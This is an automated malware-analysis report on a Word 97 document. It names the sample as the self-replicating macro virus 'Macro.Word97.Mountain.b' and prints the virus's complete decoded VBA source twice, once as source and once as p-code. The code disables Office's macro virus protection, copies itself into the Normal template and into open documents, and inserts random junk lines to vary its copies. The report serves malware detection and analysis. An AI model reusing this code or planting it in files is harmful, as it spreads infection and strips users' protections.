Office (OLE) / .DOC malware analysis — malicious · 5ab1dba298865e6f

MALICIOUS

Office (OLE) / .DOC

44.5 KB Created: 1999-05-09 08:48:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 74ec913f3960a3ce5d41f5a199150b6c SHA-1: 1bed48fbebc42c66827c9c4345ce9fa82555f469 SHA-256: 5ab1dba298865e6fdd25d0dcb2c65799f13a52e39fef7e143615a51c1fb30d01

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a Microsoft Word document containing VBA macros. The critical heuristic firing indicates that the macro attempts to replicate itself and disable Office's macro virus protection. The VBA code explicitly disables 'VirusProtection', 'ConfirmConversions', and 'SaveNormalPrompt' options, and attempts to copy its code between the Normal template and the active document, indicating a self-replicating macro-virus.

Heuristics 2

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
   Options.VirusProtection = False
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9770 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9770 bytes
SHA-256: `bfbc2d7fe8caa9406025c995efb7964a8758ca6e47baa6984f5c29ae3fe92a05`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Модуль1" 'Mountain Private Sub Document_Close() Dim MountainJ, MountainMT On Error Resume Next 'Macro.Word97.Mountain.b by Duke/SMF Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule Options.VirusProtection = False Options.ConfirmConversions = False Options.SaveNormalPrompt = False Randomize MountainJ = 1 MountainMT = Mid(AD.Lines(1, 1), 2) If NT.Lines(1, 1) <> "'Mountain" Then For i = 1 To AD.CountOfLines NT.InsertLines MountainJ, MountainRP(AD.Lines(i, 1), MountainMT, MountainGN(26, 65)) MountainJ = MountainJ + 1 MountainEX = Mid(AD.Lines(i, 1), 1, 1) If MountainEX = Asc(" ") Then MountainNT Next End If MountainJ = 1 MountainMT = Mid(NT.Lines(1, 1), 2) If AD.Lines(1, 1) <> "'Mountain" Then For i = 1 To NT.CountOfLines AD.InsertLines MountainJ, MountainRP(NT.Lines(i, 1), MountainMT, MountainGN(26, 65)) MountainJ = MountainJ + 1 MountainEX = Mid(NT.Lines(i, 1), 1, 1) If MountainEX = Asc(" ") Then MountainAD Next End If End Sub Function MountainNT() R = Rnd If R < 1 And R > 0.08 Then NT.InsertLines MountainJ, " " + MountainGN(26, 65) + " = " + Chr(34) + MountainGN(128, 48) + Chr(34) End If If R < 0.08 And R > 0.05 Then NT.InsertLines MountainJ, " '" + MountainGN(128, 48) End If If R < 0.05 And R > 0.03 Then NT.InsertLines MountainJ, " " End If If R > 0.03 Then MountainJ = MountainJ + 1 End Function Function MountainAD() R = Rnd If R < 1 And R > 0.08 Then AD.InsertLines MountainJ, " " + MountainGN(26, 65) + " = " + Chr(34) + MountainGN(128, 48) + Chr(34) End If If R < 0.08 And R > 0.05 Then AD.InsertLines MountainJ, " '" + MountainGN(128, 48) End If If R < 0.05 And R > 0.03 Then AD.InsertLines MountainJ, " " End If If R > 0.03 Then MountainJ = MountainJ + 1 End Function Function MountainGN(x, y) MountainGN = "" For i = 1 To Int(20 * Rnd + 1) MountainGN = MountainGN + Chr(Int(x * Rnd + y)) Next End Function Function MountainRP(s, a, b) i = 1 Do While i < Len(s) If Mid(s, i, Len(a)) = a Then s = Mid(s, 1, i - 1) + b + Mid(s, i + 1) End If Loop End Function ' Processing file: /tmp/tmplw7m5r_b ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 1120 bytes ' Macros/VBA/Модуль1 - 10950 bytes ' Line #0: ' QuoteRem 0x0000 0x0008 "Mountain" ' Line #1: ' FuncDefn (Private Sub Document_Close()) ' Line #2: ' Dim ' VarDefn MountainJ ' VarDefn MountainMT ' Line #3: ' OnError (Resume Next) ' Line #4: ' QuoteRem 0x0003 0x0023 "Macro.Word97.Mountain.b by Duke/SMF" ' Line #5: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set NT ' Line #6: ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set AD ' Line #7: ' LitVarSpecial (False) ' Ld Options ' MemSt VirusProtection ' Line #8: ' LitVarSpecial (False) ' Ld Options ' MemSt ConfirmConversions ' Line #9: ' LitVarSpecial (False) ' Ld Options ' MemSt SaveNormalPrompt ' Line #10: ' ArgsCall Read 0x0000 ' Line #11: ' LitDI2 0x0001 ' St MountainJ ' Line #12: ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld AD ' ArgsMemLd Lines 0x0002 ' LitDI2 0x0002 ' ArgsLd Mid$ 0x0002 ' St MountainMT ' Line #13: ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld NT ' ArgsMemLd Lines 0x0002 ' LitStr 0x0009 "'Mountain" ' Ne ' IfBlock ' Line #14: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0001 ' Ld AD ' MemLd CountOfLines ' For ' Line #15: ' Ld MountainJ ' Ld i ' LitDI2 0x0001 ' Ld AD ' ArgsMemLd Lines 0x0002 ' Ld MountainMT ' LitDI2 0x001A ' LitDI2 0x0041 ' ArgsLd MountainGN 0x0002 ' ArgsLd MountainRP 0x0003 ' Ld NT ' ArgsMemCall InsertLines 0x0002 ' Line #16: ' Ld MountainJ ' LitDI2 0x0001 ' Add ' St MountainJ ' Line #17: ' Ld i ' LitDI2 0x0001 ' Ld AD ' ArgsMemLd Lines 0x0002 ' LitDI2 0x0001 ' LitDI2 0x0001 ' ArgsLd Mid$ 0x0003 ' St MountainEX ' Line #18: ' Ld MountainEX ' LitStr 0x0001 " " ' ArgsLd Asc 0x0001 ' Eq ' If ' BoSImplicit ' ArgsCall MountainNT 0x0000 ' EndIf ' Line #19: ' StartForVariable ' Next ' Line #20: ' EndIfBlock ' Line #21: ' LitDI2 0x0001 ' St MountainJ ' Line #22: ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld NT ' ArgsMemLd Lines 0x0002 ' LitDI2 0x0002 ' ArgsLd Mid$ 0x0002 ' St MountainMT ' Line #23: ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld AD ' ArgsMemLd Lines 0x0002 ' LitStr 0x0009 "'Mountain" ' Ne ' IfBlock ' Line #24: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0001 ' Ld NT ' MemLd CountOfLines ' For ' Line #25: ' Ld MountainJ ' Ld i ' LitDI2 0x0001 ' Ld NT ' ArgsMemLd Lines 0x0002 ' Ld MountainMT ' LitDI2 0x001A ' LitDI2 0x0041 ' ArgsLd MountainGN 0x0002 ' ArgsLd MountainRP 0x0003 ' Ld AD ' ArgsMemCall InsertLines 0x0002 ' Line #26: ' Ld MountainJ ' LitDI2 0x0001 ' Add ' St MountainJ ' Line #27: ' Ld i ' LitDI2 0x0001 ' Ld NT ' ArgsMemLd Lines 0x0002 ' LitDI2 0x0001 ' LitDI2 0x0001 ' ArgsLd Mid$ 0x0003 ' St MountainEX ' Line #28: ' Ld MountainEX ' LitStr 0x0001 " " ' ArgsLd Asc 0x0001 ' Eq ' If ' BoSImplicit ' ArgsCall MountainAD 0x0000 ' EndIf ' Line #29: ' StartForVariable ' Next ' Line #30: ' EndIfBlock ' Line #31: ' EndSub ' Line #32: ' FuncDefn (Function MountainNT()) ' Line #33: ' Ld Rnd ' St R ' Line #34: ' Ld R ' LitDI2 0x0001 ' Lt ' Ld R ' LitR8 0x147B 0x47AE 0x7AE1 0x3FB4 ' Gt ' And ' IfBlock ' Line #35: ' Ld MountainJ ' LitStr 0x0001 " " ' LitDI2 0x001A ' LitDI2 0x0041 ' ArgsLd MountainGN 0x0002 ' Add ' LitStr 0x0003 " = " ' Add ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Add ' LitDI2 0x0080 ' LitDI2 0x0030 ' ArgsLd MountainGN 0x0002 ' Add ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Add ' Ld NT ' ArgsMemCall InsertLines 0x0002 ' Line #36: ' EndIfBlock ' Line #37: ' Ld R ' LitR8 0x147B 0x47AE 0x7AE1 0x3FB4 ' Lt ' Ld R ' LitR8 0x999A 0x9999 0x9999 0x3FA9 ' Gt ' And ' IfBlock ' Line #38: ' Ld MountainJ ' LitStr 0x0002 " '" ' LitDI2 0x0080 ' LitDI2 0x0030 ' ArgsLd MountainGN 0x0002 ' Add ' Ld NT ' ArgsMemCall InsertLines 0x0002 ' Line #39: ' EndIfBlock ' Line #40: ' Ld R ' LitR8 0x999A 0x9999 0x9999 0x3FA9 ' Lt ' Ld R ' LitR8 0x1EB8 0xEB85 0xB851 0x3F9E ' Gt ' And ' IfBlock ' Line #41: ' Ld MountainJ ' LitStr 0x0002 " " ' Ld NT ' ArgsMemCall InsertLines 0x0002 ' Line #42: ' EndIfBlock ' Line #43: ' Ld R ' LitR8 0x1EB8 0xEB85 0xB851 0x3F9E ' Gt ' If ' BoSImplicit ' Ld MountainJ ' LitDI2 0x0001 ' Add ' St MountainJ ' EndIf ' Line #44: ' EndFunc ' Line #45: ' FuncDefn (Function MountainAD()) ' Line #46: ' Ld Rnd ' St R ' Line #47: ' Ld R ' LitDI2 0x0001 ' Lt ' Ld R ' LitR8 0x147B 0x47AE 0x7AE1 0x3FB4 ' Gt ' And ' IfBlock ' Line #48: ' Ld MountainJ ' LitStr 0x0001 " " ' LitDI2 0x001A ' LitDI2 0x0041 ' ArgsLd MountainGN 0x0002 ' Add ' LitStr 0x0003 " = " ' Add ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Add ' LitDI2 0x0080 ' LitDI2 0x0030 ' ArgsLd MountainGN 0x0002 ' Add ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Add ' Ld AD ' ArgsMemCall InsertLines 0x0002 ' Line #49: ' EndIfBlock ' Line #50: ' Ld R ' LitR8 0x147B 0x47AE 0x7AE1 0x3FB4 ' Lt ' Ld R ' LitR8 0x999A 0x9999 0x9999 0x3FA9 ' Gt ' And ' IfBlock ' Line #51: ' Ld MountainJ ' LitStr 0x0002 " '" ' LitDI2 0x0080 ' LitDI2 0x0030 ' ArgsLd MountainGN 0x0002 ' Add ' Ld AD ' ArgsMemCall InsertLines 0x0002 ' Line #52: ' EndIfBlock ' Line #53: ' Ld R ' LitR8 0x999A 0x9999 0x9999 0x3FA9 ' Lt ' Ld R ' LitR8 0x1EB8 0xEB85 0xB851 0x3F9E ' Gt ' And ' IfBlock ' Line #54: ' Ld MountainJ ' LitStr 0x0002 " " ' Ld AD ' ArgsMemCall InsertLines 0x0002 ' Line #55: ' EndIfBlock ' Line #56: ' Ld R ' LitR8 0x1EB8 0xEB85 0xB851 0x3F9E ' Gt ' If ' BoSImplicit ' Ld MountainJ ' LitDI2 0x0001 ' Add ' St MountainJ ' EndIf ' Line #57: ' EndFunc ' Line #58: ' FuncDefn (Function MountainGN(x, y)) ' Line #59: ' LitStr 0x0000 "" ' St MountainGN ' Line #60: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0001 ' LitDI2 0x0014 ' Ld Rnd ' Mul ' LitDI2 0x0001 ' Add ' FnInt ' For ' Line #61: ' Ld MountainGN ' Ld x ' Ld Rnd ' Mul ' Ld y ' Add ' FnInt ' ArgsLd Chr 0x0001 ' Add ' St MountainGN ' Line #62: ' StartForVariable ' Next ' Line #63: ' EndFunc ' Line #64: ' FuncDefn (Function MountainRP(s, a, B)) ' Line #65: ' LitDI2 0x0001 ' St i ' Line #66: ' Ld i ' Ld s ' FnLen ' Lt ' DoWhile ' Line #67: ' Ld s ' Ld i ' Ld a ' FnLen ' ArgsLd Mid$ 0x0003 ' Ld a ' Eq ' IfBlock ' Line #68: ' Ld s ' LitDI2 0x0001 ' Ld i ' LitDI2 0x0001 ' Sub ' ArgsLd Mid$ 0x0003 ' Ld B ' Add ' Ld s ' Ld i ' LitDI2 0x0001 ' Add ' ArgsLd Mid$ 0x0002 ' Add ' St s ' Line #69: ' EndIfBlock ' Line #70: ' Loop ' Line #71: ' EndFunc

SHA-256: bfbc2d7fe8caa9406025c995efb7964a8758ca6e47baa6984f5c29ae3fe92a05

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Модуль1"
'Mountain
Private Sub Document_Close()
Dim MountainJ, MountainMT
   On Error Resume Next
   'Macro.Word97.Mountain.b by Duke/SMF
   Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
   Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
   Options.VirusProtection = False
   Options.ConfirmConversions = False
   Options.SaveNormalPrompt = False
   Randomize
   MountainJ = 1
   MountainMT = Mid(AD.Lines(1, 1), 2)
   If NT.Lines(1, 1) <> "'Mountain" Then
      For i = 1 To AD.CountOfLines
         NT.InsertLines MountainJ, MountainRP(AD.Lines(i, 1), MountainMT, MountainGN(26, 65))
         MountainJ = MountainJ + 1
         MountainEX = Mid(AD.Lines(i, 1), 1, 1)
         If MountainEX = Asc(" ") Then MountainNT
      Next
   End If
   MountainJ = 1
   MountainMT = Mid(NT.Lines(1, 1), 2)
   If AD.Lines(1, 1) <> "'Mountain" Then
      For i = 1 To NT.CountOfLines
         AD.InsertLines MountainJ, MountainRP(NT.Lines(i, 1), MountainMT, MountainGN(26, 65))
         MountainJ = MountainJ + 1
         MountainEX = Mid(NT.Lines(i, 1), 1, 1)
         If MountainEX = Asc(" ") Then MountainAD
      Next
   End If
End Sub
Function MountainNT()
   R = Rnd
   If R < 1 And R > 0.08 Then
      NT.InsertLines MountainJ, " " + MountainGN(26, 65) + " = " + Chr(34) + MountainGN(128, 48) + Chr(34)
   End If
   If R < 0.08 And R > 0.05 Then
      NT.InsertLines MountainJ, " '" + MountainGN(128, 48)
   End If
   If R < 0.05 And R > 0.03 Then
      NT.InsertLines MountainJ, "  "
   End If
   If R > 0.03 Then MountainJ = MountainJ + 1
End Function
Function MountainAD()
   R = Rnd
   If R < 1 And R > 0.08 Then
      AD.InsertLines MountainJ, " " + MountainGN(26, 65) + " = " + Chr(34) + MountainGN(128, 48) + Chr(34)
   End If
   If R < 0.08 And R > 0.05 Then
      AD.InsertLines MountainJ, " '" + MountainGN(128, 48)
   End If
   If R < 0.05 And R > 0.03 Then
      AD.InsertLines MountainJ, "  "
   End If
   If R > 0.03 Then MountainJ = MountainJ + 1
End Function
Function MountainGN(x, y)
   MountainGN = ""
   For i = 1 To Int(20 * Rnd + 1)
      MountainGN = MountainGN + Chr(Int(x * Rnd + y))
   Next
End Function
Function MountainRP(s, a, b)
   i = 1
   Do While i < Len(s)
      If Mid(s, i, Len(a)) = a Then
         s = Mid(s, 1, i - 1) + b + Mid(s, i + 1)
      End If
   Loop
End Function

' Processing file: /tmp/tmplw7m5r_b
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/Модуль1 - 10950 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0008 "Mountain"
' Line #1:
' 	FuncDefn (Private Sub Document_Close())
' Line #2:
' 	Dim 
' 	VarDefn MountainJ
' 	VarDefn MountainMT
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	QuoteRem 0x0003 0x0023 "Macro.Word97.Mountain.b by Duke/SMF"
' Line #5:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set NT 
' Line #6:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set AD 
' Line #7:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #8:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #9:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #10:
' 	ArgsCall Read 0x0000 
' Line #11:
' 	LitDI2 0x0001 
' 	St MountainJ 
' Line #12:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0002 
' 	St MountainMT 
' Line #13:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NT 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0009 "'Mountain"
' 	Ne 
' 	IfBlock 
' Line #14:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	MemLd CountOfLines 
' 	For 
' Line #15:
' 	Ld MountainJ 
' 	Ld i 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	ArgsMemLd Lines 0x0002 
' 	Ld MountainMT 
' 	LitDI2 0x001A 
' 	LitDI2 0x0041 
' 	ArgsLd MountainGN 0x0002 
' 	ArgsLd MountainRP 0x0003 
' 	Ld NT 
' 	ArgsMemCall InsertLines 0x0002 
' Line #16:
' 	Ld MountainJ 
' 	LitDI2 0x0001 
' 	Add 
' 	St MountainJ 
' Line #17:
' 	Ld i 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	St MountainEX 
' Line #18:
' 	Ld MountainEX 
' 	LitStr 0x0001 " "
' 	ArgsLd Asc 0x0001 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ArgsCall MountainNT 0x0000 
' 	EndIf 
' Line #19:
' 	StartForVariable 
' 	Next 
' Line #20:
' 	EndIfBlock 
' Line #21:
' 	LitDI2 0x0001 
' 	St MountainJ 
' Line #22:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NT 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0002 
' 	St MountainMT 
' Line #23:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0009 "'Mountain"
' 	Ne 
' 	IfBlock 
' Line #24:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld NT 
' 	MemLd CountOfLines 
' 	For 
' Line #25:
' 	Ld MountainJ 
' 	Ld i 
' 	LitDI2 0x0001 
' 	Ld NT 
' 	ArgsMemLd Lines 0x0002 
' 	Ld MountainMT 
' 	LitDI2 0x001A 
' 	LitDI2 0x0041 
' 	ArgsLd MountainGN 0x0002 
' 	ArgsLd MountainRP 0x0003 
' 	Ld AD 
' 	ArgsMemCall InsertLines 0x0002 
' Line #26:
' 	Ld MountainJ 
' 	LitDI2 0x0001 
' 	Add 
' 	St MountainJ 
' Line #27:
' 	Ld i 
' 	LitDI2 0x0001 
' 	Ld NT 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	St MountainEX 
' Line #28:
' 	Ld MountainEX 
' 	LitStr 0x0001 " "
' 	ArgsLd Asc 0x0001 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ArgsCall MountainAD 0x0000 
' 	EndIf 
' Line #29:
' 	StartForVariable 
' 	Next 
' Line #30:
' 	EndIfBlock 
' Line #31:
' 	EndSub 
' Line #32:
' 	FuncDefn (Function MountainNT())
' Line #33:
' 	Ld Rnd 
' 	St R 
' Line #34:
' 	Ld R 
' 	LitDI2 0x0001 
' 	Lt 
' 	Ld R 
' 	LitR8 0x147B 0x47AE 0x7AE1 0x3FB4 
' 	Gt 
' 	And 
' 	IfBlock 
' Line #35:
' 	Ld MountainJ 
' 	LitStr 0x0001 " "
' 	LitDI2 0x001A 
' 	LitDI2 0x0041 
' 	ArgsLd MountainGN 0x0002 
' 	Add 
' 	LitStr 0x0003 " = "
' 	Add 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	LitDI2 0x0080 
' 	LitDI2 0x0030 
' 	ArgsLd MountainGN 0x0002 
' 	Add 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	Ld NT 
' 	ArgsMemCall InsertLines 0x0002 
' Line #36:
' 	EndIfBlock 
' Line #37:
' 	Ld R 
' 	LitR8 0x147B 0x47AE 0x7AE1 0x3FB4 
' 	Lt 
' 	Ld R 
' 	LitR8 0x999A 0x9999 0x9999 0x3FA9 
' 	Gt 
' 	And 
' 	IfBlock 
' Line #38:
' 	Ld MountainJ 
' 	LitStr 0x0002 " '"
' 	LitDI2 0x0080 
' 	LitDI2 0x0030 
' 	ArgsLd MountainGN 0x0002 
' 	Add 
' 	Ld NT 
' 	ArgsMemCall InsertLines 0x0002 
' Line #39:
' 	EndIfBlock 
' Line #40:
' 	Ld R 
' 	LitR8 0x999A 0x9999 0x9999 0x3FA9 
' 	Lt 
' 	Ld R 
' 	LitR8 0x1EB8 0xEB85 0xB851 0x3F9E 
' 	Gt 
' 	And 
' 	IfBlock 
' Line #41:
' 	Ld MountainJ 
' 	LitStr 0x0002 "  "
' 	Ld NT 
' 	ArgsMemCall InsertLines 0x0002 
' Line #42:
' 	EndIfBlock 
' Line #43:
' 	Ld R 
' 	LitR8 0x1EB8 0xEB85 0xB851 0x3F9E 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	Ld MountainJ 
' 	LitDI2 0x0001 
' 	Add 
' 	St MountainJ 
' 	EndIf 
' Line #44:
' 	EndFunc 
' Line #45:
' 	FuncDefn (Function MountainAD())
' Line #46:
' 	Ld Rnd 
' 	St R 
' Line #47:
' 	Ld R 
' 	LitDI2 0x0001 
' 	Lt 
' 	Ld R 
' 	LitR8 0x147B 0x47AE 0x7AE1 0x3FB4 
' 	Gt 
' 	And 
' 	IfBlock 
' Line #48:
' 	Ld MountainJ 
' 	LitStr 0x0001 " "
' 	LitDI2 0x001A 
' 	LitDI2 0x0041 
' 	ArgsLd MountainGN 0x0002 
' 	Add 
' 	LitStr 0x0003 " = "
' 	Add 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	LitDI2 0x0080 
' 	LitDI2 0x0030 
' 	ArgsLd MountainGN 0x0002 
' 	Add 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	Ld AD 
' 	ArgsMemCall InsertLines 0x0002 
' Line #49:
' 	EndIfBlock 
' Line #50:
' 	Ld R 
' 	LitR8 0x147B 0x47AE 0x7AE1 0x3FB4 
' 	Lt 
' 	Ld R 
' 	LitR8 0x999A 0x9999 0x9999 0x3FA9 
' 	Gt 
' 	And 
' 	IfBlock 
' Line #51:
' 	Ld MountainJ 
' 	LitStr 0x0002 " '"
' 	LitDI2 0x0080 
' 	LitDI2 0x0030 
' 	ArgsLd MountainGN 0x0002 
' 	Add 
' 	Ld AD 
' 	ArgsMemCall InsertLines 0x0002 
' Line #52:
' 	EndIfBlock 
' Line #53:
' 	Ld R 
' 	LitR8 0x999A 0x9999 0x9999 0x3FA9 
' 	Lt 
' 	Ld R 
' 	LitR8 0x1EB8 0xEB85 0xB851 0x3F9E 
' 	Gt 
' 	And 
' 	IfBlock 
' Line #54:
' 	Ld MountainJ 
' 	LitStr 0x0002 "  "
' 	Ld AD 
' 	ArgsMemCall InsertLines 0x0002 
' Line #55:
' 	EndIfBlock 
' Line #56:
' 	Ld R 
' 	LitR8 0x1EB8 0xEB85 0xB851 0x3F9E 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	Ld MountainJ 
' 	LitDI2 0x0001 
' 	Add 
' 	St MountainJ 
' 	EndIf 
' Line #57:
' 	EndFunc 
' Line #58:
' 	FuncDefn (Function MountainGN(x, y))
' Line #59:
' 	LitStr 0x0000 ""
' 	St MountainGN 
' Line #60:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0014 
' 	Ld Rnd 
' 	Mul 
' 	LitDI2 0x0001 
' 	Add 
' 	FnInt 
' 	For 
' Line #61:
' 	Ld MountainGN 
' 	Ld x 
' 	Ld Rnd 
' 	Mul 
' 	Ld y 
' 	Add 
' 	FnInt 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	St MountainGN 
' Line #62:
' 	StartForVariable 
' 	Next 
' Line #63:
' 	EndFunc 
' Line #64:
' 	FuncDefn (Function MountainRP(s, a, B))
' Line #65:
' 	LitDI2 0x0001 
' 	St i 
' Line #66:
' 	Ld i 
' 	Ld s 
' 	FnLen 
' 	Lt 
' 	DoWhile 
' Line #67:
' 	Ld s 
' 	Ld i 
' 	Ld a 
' 	FnLen 
' 	ArgsLd Mid$ 0x0003 
' 	Ld a 
' 	Eq 
' 	IfBlock 
' Line #68:
' 	Ld s 
' 	LitDI2 0x0001 
' 	Ld i 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd Mid$ 0x0003 
' 	Ld B 
' 	Add 
' 	Ld s 
' 	Ld i 
' 	LitDI2 0x0001 
' 	Add 
' 	ArgsLd Mid$ 0x0002 
' 	Add 
' 	St s 
' Line #69:
' 	EndIfBlock 
' Line #70:
' 	Loop 
' Line #71:
' 	EndFunc

Open this report in the interactive analyzer, or submit your own file for analysis.